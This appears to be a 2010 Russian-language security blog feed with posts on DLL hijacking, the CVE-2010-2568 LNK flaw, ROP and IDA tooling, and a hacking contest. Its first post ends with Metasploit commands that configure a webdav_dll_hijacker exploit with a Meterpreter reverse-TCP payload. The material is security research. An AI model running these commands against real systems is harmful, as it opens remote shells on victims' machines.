exploit/windows/browser/webdav_dll_hijacker&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: monospace; font-size: 14px; line-height: 18px; white-space: pre;"&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: lime; font-family: monospace; white-space: pre;"&gt;msf exploit(webdav_dll_hijacker) &amp;gt; set EXTENSIONS "txt"&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: lime; font-family: monospace; white-space: pre;"&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: lime; font-family: monospace; white-space: pre;"&gt;msf exploit(webdav_dll_hijacker) &amp;gt; set PAYLOAD windows/meterpreter/reverse_tcp&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: lime; font-family: monospace; white-space: pre;"&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: lime; font-family: monospace; white-space: pre;"&gt;msf exploit(webdav_dll_hijacker) &amp;gt; set LPORT 6666&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: lime; font-family: monospace; white-space: pre;"&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: lime; font-family: monospace; white-space: pre;"&gt;msf exploit(webdav_dll_hijacker) &amp;gt; set LHOST &lt;your_ip&gt;&lt;/your_ip&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: lime; font-family: monospace; white-space: pre;"&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: lime; font-family: monospace; white-space: pre;"&gt;msf exploit(webdav_dll_hijacker) &amp;gt; exploit&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: lime; font-family: monospace; white-space: pre;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;P.S.: Как оказалось даже существуют научные работы ("&lt;a href="http://www.cs.ucdavis.edu/research/tech-reports/2010/CSE-2010-2.pdf"&gt;Automatic Detection of Vulnerable Dynamic Component Loadings&lt;/a&gt;") по поиску решения этой проблемы.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-1575755025118757817?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/1575755025118757817/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2010/08/0-day-by-design-security-advisory.html#comment-form' title='Комментарии: 3'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/1575755025118757817'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/1575755025118757817'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2010/08/0-day-by-design-security-advisory.html' title='0-day by design (Security Advisory (2269637))'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-1271524913456278714</id><published>2010-08-17T18:09:00.000+04:00</published><updated>2010-08-17T18:09:55.597+04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tools'/><category scheme='http://www.blogger.com/atom/ns#' term='ROP'/><category scheme='http://www.blogger.com/atom/ns#' term='IdaPython'/><category scheme='http://www.blogger.com/atom/ns#' term='IDA'/><category scheme='http://www.blogger.com/atom/ns#' term='Reversing'/><title type='text'>Dr.Gadget спешит на помощь</title><content type='html'>Попался тут недавно на глаза довольно любопытный плагин для IDA, основной задачей которого является помощь в анализе и подготовки ROP-последовательностей.&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_gn-7ejyJv08/TGqT5qgo5jI/AAAAAAAAAqc/CO6AhJNA0LY/s1600/rop.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="http://3.bp.blogspot.com/_gn-7ejyJv08/TGqT5qgo5jI/AAAAAAAAAqc/CO6AhJNA0LY/s400/rop.png" width="342" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Зовут это чудо&amp;nbsp;&lt;a href="http://dr.gadget/"&gt;Dr.Gadget&lt;/a&gt;&amp;nbsp;и умеет он следующее:&lt;br /&gt;- собственно загрузку ROP-последовательности в виде бинарного файла и ее редактирование (удобно при написании сплойтов).&lt;br /&gt;- добавление элементов из загруженного в IDA файла (удобно для поиска и добавления rop gadgets)&lt;br /&gt;- поиск последовательностей ассемблерных инструкций и добавление их&lt;br /&gt;&lt;br /&gt;Плагин можно использовать как при статическом анализе, так и при динамическом, что собственно удобно при анализе эксплойтов использующих технику ROP.&lt;br /&gt;&lt;br /&gt;Ну и на последок вот вам &lt;a href="http://www.corelan.be:8800/index.php/security/rop-gadgets/"&gt;ссылка&lt;/a&gt; на достаточно большую коллекцию уже готовых&amp;nbsp;rop gadgets от &lt;a href="http://www.corelan.be:8800/"&gt;corelanc0d3r&lt;/a&gt;.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-1271524913456278714?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/1271524913456278714/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2010/08/drgadget.html#comment-form' title='Комментарии: 0'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/1271524913456278714'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/1271524913456278714'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2010/08/drgadget.html' title='Dr.Gadget спешит на помощь'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_gn-7ejyJv08/TGqT5qgo5jI/AAAAAAAAAqc/CO6AhJNA0LY/s72-c/rop.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-4157908476345134953</id><published>2010-08-13T17:58:00.000+04:00</published><updated>2011-08-30T20:13:17.605+04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Events'/><category scheme='http://www.blogger.com/atom/ns#' term='Reversing'/><category scheme='http://www.blogger.com/atom/ns#' term='CC'/><title type='text'>CrackME для СС'2010</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;Довелось&amp;nbsp;поучаствовать&amp;nbsp;в разработке одного из заданий на реверсинг для HackQuest на СС'2010.&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_gn-7ejyJv08/TGVNvNXdOeI/AAAAAAAAAqU/kvyex3L346E/s1600/%D0%A1%D0%BD%D0%B8%D0%BC%D0%BE%D0%BA.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="97" src="http://1.bp.blogspot.com/_gn-7ejyJv08/TGVNvNXdOeI/AAAAAAAAAqU/kvyex3L346E/s400/%D0%A1%D0%BD%D0%B8%D0%BC%D0%BE%D0%BA.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;В процессе прохождения задания можно получить больше двух ключей (очки по которым&amp;nbsp;оценивается&amp;nbsp;успешность участника), но больше я вам ничего не скажу :)&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-4157908476345134953?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/4157908476345134953/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2010/08/crackme-2010.html#comment-form' title='Комментарии: 7'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/4157908476345134953'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/4157908476345134953'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2010/08/crackme-2010.html' title='CrackME для СС&apos;2010'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_gn-7ejyJv08/TGVNvNXdOeI/AAAAAAAAAqU/kvyex3L346E/s72-c/%D0%A1%D0%BD%D0%B8%D0%BC%D0%BE%D0%BA.PNG' height='72' width='72'/><thr:total>7</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-3151421466674829011</id><published>2010-08-13T01:35:00.001+04:00</published><updated>2011-08-30T20:13:08.701+04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Events'/><category scheme='http://www.blogger.com/atom/ns#' term='CC'/><title type='text'>Chaos Constructions'2010</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://cc.org.ru/9/img/top_left.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="92" src="http://cc.org.ru/9/img/top_left.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;Традиционно в в конце августа проходит мероприятие под названием&amp;nbsp;&lt;a href="http://party10.cc.org.ru/index.php"&gt;Chaos Constructions&lt;/a&gt; и в рамках него не менее традиционно проходит конкурс HackQuest. В прошлом году у меня лично сложилось не очень приятное впечатление от мероприятия в целом, но в этот раз орги &lt;s&gt;взялись за ум&lt;/s&gt;&amp;nbsp;подготовились более серьезно. В частности в подготовки конкурса&amp;nbsp;HackQuest участвовало много разных людей и получилось достаточно много разноплановых заданий. На мой взгляд будет интересно приходите поучаствовать и пообщаться. Ну а если удастся продвинуться в прохождении&amp;nbsp;HackQuest, тогда можно рассчитывать на различные материальные блага, например в виде таких вот футболок:&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;a href="http://3.bp.blogspot.com/_gn-7ejyJv08/TGRCAaBn_3I/AAAAAAAAAqE/5DKP57NgGK0/s1600/ESET_CC_230710-02.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="210" src="http://3.bp.blogspot.com/_gn-7ejyJv08/TGRCAaBn_3I/AAAAAAAAAqE/5DKP57NgGK0/s400/ESET_CC_230710-02.jpg" width="400" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;Помимо&amp;nbsp;HackQuest&amp;nbsp;уже запланировано много интересных&amp;nbsp;&lt;a href="http://party10.cc.org.ru/seminar.php"&gt;семинаров&lt;/a&gt;&amp;nbsp;по различным аспектам ИБ и не только. &amp;nbsp;Само мероприятие будет проходить в Санкт-Петербурге и запланировано на последние выходные августа (28-29). Приходите будет интересно!&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-3151421466674829011?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/3151421466674829011/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2010/08/chaos-constructions2010.html#comment-form' title='Комментарии: 0'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/3151421466674829011'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/3151421466674829011'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2010/08/chaos-constructions2010.html' title='Chaos Constructions&apos;2010'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_gn-7ejyJv08/TGRCAaBn_3I/AAAAAAAAAqE/5DKP57NgGK0/s72-c/ESET_CC_230710-02.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-8943474384231305523</id><published>2010-07-21T16:46:00.008+04:00</published><updated>2010-09-24T20:06:34.819+04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Stuxnet'/><category scheme='http://www.blogger.com/atom/ns#' term='Video'/><category scheme='http://www.blogger.com/atom/ns#' term='Statistics'/><category scheme='http://www.blogger.com/atom/ns#' term='0-day'/><category scheme='http://www.blogger.com/atom/ns#' term='Metasploit'/><category scheme='http://www.blogger.com/atom/ns#' term='Exploits'/><title type='text'>Новая багофича от MS (CVE-2010-2568)  или LNKpokalipsis</title><content type='html'>Буквально недавно была обнаружена &lt;a href="http://www.microsoft.com/technet/security/advisory/2286198.mspx"&gt;уязвимость&lt;/a&gt;&amp;nbsp;в обработке LNK-файлов и их отображением. Но самой уязвимости &lt;span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;"&gt;уделяется&lt;/span&gt; мало внимания, в основном весь шум вокруг &lt;a href="http://habrahabr.ru/company/eset/blog/99506/"&gt;Win32/Stuxnet&lt;/a&gt; и использованных валидных сертификатов для подписи &lt;span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;"&gt;компонентов&lt;/span&gt; этого зловреда.&amp;nbsp;А тем временем эта уязвимость уже появилась в публичном доступе. Сначала в виде&amp;nbsp;&lt;a href="http://www.exploit-db.com/exploits/14403/"&gt;PoC&lt;/a&gt;, а потом и в виде &lt;a href="http://www.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/browser/ms10_046_shortcut_icon_dllloader.rb"&gt;модуля&lt;/a&gt; для Metasploit. MS, как в прочем и обычно, пофиг на критичность этой уязвимости и она вероятнее всего&amp;nbsp;выпустит патч не раньше 10 августа. А для WinXP SP2 патча вообще не будет, хотя как не странно на ней еще есть пользователи и их не так мало, как хотелось бы. &lt;span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;"&gt;Подтверждение тому&lt;/span&gt; распределение угрозы по оконным&amp;nbsp;версиям от &lt;a href="http://www.symantec.com/connect/blogs/w32temphid-commonly-asked-questions"&gt;Symantec&lt;/a&gt;, где именно WinXP SP2 имеет большую долю зафиксированных инцидентов. &amp;nbsp; &lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_gn-7ejyJv08/TEbq6N1UiqI/AAAAAAAAApQ/cGoQEWcBkLA/s1600/OS-Temphid.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="251" src="http://1.bp.blogspot.com/_gn-7ejyJv08/TEbq6N1UiqI/AAAAAAAAApQ/cGoQEWcBkLA/s400/OS-Temphid.JPG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;В качестве векторов использования этой уязвимости могут быть не только USB-накопитили, но и сетевые ресурсы. Например, в Metasploit &lt;span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;"&gt;эксплуатация &lt;/span&gt;происходит через WebDAV.&amp;nbsp;Работает уязвимость&amp;nbsp;примерно так:&lt;br /&gt;&lt;br /&gt;&lt;embed height="350" src="http://www.youtube.com/v/6304Q0YoiBg" type="application/x-shockwave-flash" width="425"&gt;&lt;/embed&gt;&lt;br /&gt;&lt;br /&gt;Речь идет не о банальном&amp;nbsp;переполеннии или &lt;span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;"&gt;неразименованном&lt;/span&gt; указателе, все гораздо хуже, т.к. уязвимость by design так сказать (уязвимы все версии винды). Т.е. разработчики прохлопали ушами, что такой путь могут использовать злоумышленники для&amp;nbsp;установки всякого&amp;nbsp;вредоносного. Хотя может все гораздо хуже и это просто очередной бэкдор оставленный в системе&amp;nbsp;по просьбе NSA? Боюсь правды мы не узнаем никогда. Давайте теперь поговорим непосредственно о технических деталях работы этой уязвимости.&lt;br /&gt;CVE-2010-2568 – уязвимость&amp;nbsp;находится в&amp;nbsp;обработчике &lt;span class="Apple-style-span" style="font: normal normal normal medium/normal 'Times New Roman';"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: 13px; line-height: 20px;"&gt;LNK-файлов, о точнее связана с процессом отображения Control Panel shortcuts, когда&amp;nbsp;происходит их загрузка в память процессом Explorer.exe. Уязвимой являться&amp;nbsp;библиотека shell32.dll в которой происходит некорректная обработка. Ниже приведенная схема&amp;nbsp;иллюстрирует&amp;nbsp;потоки данных между вызываемыми&amp;nbsp;функциями в процессе работы эксплойта (подсмотренно &lt;a href="http://community.websense.com/blogs/securitylabs/archive/2010/07/20/microsoft-lnk-vulnerability-brief-technical-analysis-cve-2010-2568.aspx"&gt;здесь&lt;/a&gt;). Успешным выполнением&amp;nbsp;эксплойта является загрузка сторонней&amp;nbsp;динамической&amp;nbsp;библиотеки при помощи WinAPI функции &lt;em&gt;&lt;a href="http://msdn.microsoft.com/en-us/library/ms684175(VS.85).aspx"&gt;LoadLibraryW&lt;/a&gt;.&lt;/em&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_gn-7ejyJv08/TEbrORxGKGI/AAAAAAAAApY/YZyzce0Qti0/s1600/2625.flowgraph.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="225" src="http://4.bp.blogspot.com/_gn-7ejyJv08/TEbrORxGKGI/AAAAAAAAApY/YZyzce0Qti0/s400/2625.flowgraph.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span class="Apple-style-span" style="font: normal normal normal medium/normal 'Times New Roman';"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: 13px; line-height: 20px;"&gt;&lt;span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;"&gt;Собственно &lt;/span&gt;именно ниже приведенный код и заставляет &lt;span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;"&gt;выполниться&lt;/span&gt; вредоносную DLL, этот код находиться в функции &lt;em&gt;_LoadCPLModule&lt;/em&gt;, которыя вызывается из &lt;em&gt;CPL_LoadCPLModule&lt;/em&gt;.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_gn-7ejyJv08/TEbrVSMiXiI/AAAAAAAAApg/sK1SRhOd-WQ/s1600/flaw.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="132" src="http://4.bp.blogspot.com/_gn-7ejyJv08/TEbrVSMiXiI/AAAAAAAAApg/sK1SRhOd-WQ/s400/flaw.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span class="Apple-style-span" style="font: normal normal normal medium/normal 'Times New Roman';"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: 13px; line-height: 20px;"&gt;В эксплойте в составе Metasploit для эксплуатации уязвимости генерируется&amp;nbsp;URL следующего вида &lt;em&gt;"{webdav}{exploit_base}\\{exploit_dll}",&lt;/em&gt;&amp;nbsp;такой подход к эксплуатации этой уязвимости сильно расширяет границы ее&amp;nbsp;использования за пределы USB-накопителей.&lt;/span&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-8943474384231305523?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/8943474384231305523/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2010/07/ms-cve-2010-2568-lnkpokalipsis.html#comment-form' title='Комментарии: 0'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/8943474384231305523'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/8943474384231305523'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2010/07/ms-cve-2010-2568-lnkpokalipsis.html' title='Новая багофича от MS (CVE-2010-2568)  или LNKpokalipsis'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_gn-7ejyJv08/TEbq6N1UiqI/AAAAAAAAApQ/cGoQEWcBkLA/s72-c/OS-Temphid.JPG' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-7563804928646979815</id><published>2010-07-12T18:42:00.000+04:00</published><updated>2010-07-12T18:42:55.062+04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Statistics'/><category scheme='http://www.blogger.com/atom/ns#' term='0-day'/><category scheme='http://www.blogger.com/atom/ns#' term='Exploits'/><title type='text'>Top-10 наиболее уязвимых вендоров ПО</title><content type='html'>Интересный &lt;a href="http://secunia.com/gfx/pdf/Secunia_Half_Year_Report_2010.pdf"&gt;отчет&lt;/a&gt; обнародовала Secunia, в котором приводится срез самых крупных вендоров ПО по числу найденных уязвимостей. Интересный факт, что в этом году по числу найденных уязвимостей лидирует компания Apple, которая пришла на смену прошлогоднему лидеру Oracle. По графику можно отследить явный тренд увеличения числа найденных уязвимостей, видимо с ростом популярности эта платформа привлекает к себе все больше внимания со стороны исследователей по всему миру.   &lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_gn-7ejyJv08/TDsmuTsW_tI/AAAAAAAAApI/qrsm32Vb8P4/s1600/1.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="151" src="http://1.bp.blogspot.com/_gn-7ejyJv08/TDsmuTsW_tI/AAAAAAAAApI/qrsm32Vb8P4/s400/1.PNG" width="400" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;Судя по графику у MS стагнация начиная с 2006 года, т.е. уязвимости находят регулярно и много. А вот Adobe, как ни странно находиться только на пятом месте.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2182101645168532490-7563804928646979815?l=amatrosov.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://amatrosov.blogspot.com/feeds/7563804928646979815/comments/default' title='Комментарии к сообщению'/><link rel='replies' type='text/html' href='http://amatrosov.blogspot.com/2010/07/top-10.html#comment-form' title='Комментарии: 2'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/7563804928646979815'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2182101645168532490/posts/default/7563804928646979815'/><link rel='alternate' type='text/html' href='http://amatrosov.blogspot.com/2010/07/top-10.html' title='Top-10 наиболее уязвимых вендоров ПО'/><author><name>Aleks Matrosov</name><uri>http://www.blogger.com/profile/08962982785193124317</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://1.bp.blogspot.com/_gn-7ejyJv08/THPPcesqZaI/AAAAAAAAAqs/nkIvu0raB1Q/S220/alex.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_gn-7ejyJv08/TDsmuTsW_tI/AAAAAAAAApI/qrsm32Vb8P4/s72-c/1.PNG' height='72' width='72'/><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2182101645168532490.post-6981821187479309166</id><published>2010-07-12T16:27:00.001+04:00</published><updated>2010-07-12T16:27:50.378+04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tools'/><category scheme='http://www.blogger.com/atom/ns#' term='Deobfuscation'/><category scheme='http://www.blogger.com/atom/ns#' term='IDA'/><category scheme='http://www.blogger.com/atom/ns#' term='Reversing'/><title type='text'>IDA + Bochs: нафига оно надо?</title><content type='html'>Я как-то уже писал об эмуляторе &lt;a href="http://amatrosov.blogspot.com/2009/12/x86emu.html"&gt;x86emu&lt;/a&gt; для IDA, но сегодня я хочу рассказать о гораздо более мощном эмуляторе &lt;a href="http://bochs.sourceforge.net/"&gt;Bochs&lt;/a&gt;. Bochs представляет собой полный эмулятор системы, на базе которого вы можете загрузить любую ОС (если только нужное для загрузки этой ОС железо поддерживается эмулятором).&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img-fotki.yandex.ru/get/3415/matros0ff.9/0_4f763_78d5ea70_L.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="273" src="http://img-fotki.yandex.ru/get/3415/matros0ff.9/0_4f763_78d5ea70_L.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;В эмуляторе есть &lt;a href="http://bochs.sourceforge.net/cgi-bin/topper.pl?name=New+Bochs+Documentation&amp;amp;url=http://bochs.sourceforge.net/doc/docbook/user/index.html"&gt;встроенный отладчик&lt;/a&gt;, который позволяет отлаживать загрузку операционной системы еще на раннем этапе. Но самое интересное другое, а точнее то, что начиная с версии &lt;a href="http://hex-rays.com/idapro/54/index.htm"&gt;IDA Pro 5.4&lt;/a&gt; появилась возможность подключаться к отладчику Bochs из стандартного интерфейса IDA. Работает эта связка достаточно быстро, в отличии, если вы попытаетесь загрузить винду под эмулятором и выполнить какие-то осмысленные действия. А том, как подключить отладчик Bochs из IDA уже есть &lt;a href="https://docs.google.com/viewer?url=http%3A%2F%2Fhex-rays.com%2Fidapro%2Fdebugger%2Fbochs_tut.pdf"&gt;хороший мануал&lt;/a&gt;, а я постараюсь рассказать собственно зачем это делать. На самом деле эту возможность почему то многие упускают из виду, хотя порой эта фича оказывается крайне полезной. Например, при отладке шелл-кода, обфусцированного кода или когда просто нужно быстро выполнить произвольный участок исполняемого файла. IDA поддерживает несколько режимов отладки в связке с Bochs:&lt;br /&gt;- отладка ранней стадии загрузки (Disk Image), что позволяет отлаживать boot record&lt;br /&gt;- отладка произвольного участка кода (IDB), позволяет выполнить на эмуляторе любой выделенный участок кода. Этот режим полезен при отладке шелл-кода и обфусцтрованных участков кода&lt;br /&gt;- отладка исполняемого файла (PE), стандартный режим отладки&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img-fotki.yandex.ru/get/3416/matros0ff.9/0_4f764_e416441_L.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://img-fotki.yandex.ru/get/3416/matros0ff.9/0_4f764_e416441_L.jpg" width="248" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;a href="http://hexblog.com/2009/09/develop_your_master_boot_recor.html"&gt;Отладка загрузочной записи&lt;/a&gt; бывает очень полезна при анализе зловредов, которые ее модифицируют (mebroot, gootkit ...). &lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://hexblog.com/ida_pro/pix/mbr_final.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="216" src="http://hexblog.com/ida_pro/pix/mbr_final.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;Использование связки IDA + Bochs значительно эффективнее, нежели x86emu, т.к. здесь происходит эмуляция не выборочного набора вызовов API, а работы всей ОС 